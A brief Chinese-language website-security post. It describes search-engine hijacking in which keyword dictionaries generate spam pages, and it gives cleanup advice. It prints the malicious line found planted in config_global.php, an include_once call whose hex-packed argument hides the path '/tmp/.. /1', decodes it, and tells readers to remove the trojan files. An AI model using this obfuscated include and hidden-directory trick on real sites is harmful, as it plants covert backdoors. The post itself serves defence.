利用字典文件繁殖文章使用include引用并提交给搜索引擎实施劫持
字典文件是一些关键词文件为文章生成提供资源,生成劫持静态文件放到要引用的文件中,根据SEO知识可知一般目录都不会太深,比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取,平时注意下你的目录下sitemap.txt是否被篡改。
此种挂马相对更加隐蔽些,只需在Include中加上劫持目录即可。
查看/config/config_global.php文件,会发现底部多了一行Include引用代码:
@INCLUDE_ONCE(PACK('H*','2f746d702f2e2e202f31'));【处理方法】
解密代码:2f746d702f2e2e202f31 解密后为:/tmp/.. /1查看此目录找到并清理木马文件。
上一篇:怎么辨别一个网站是否是基于dede搭建?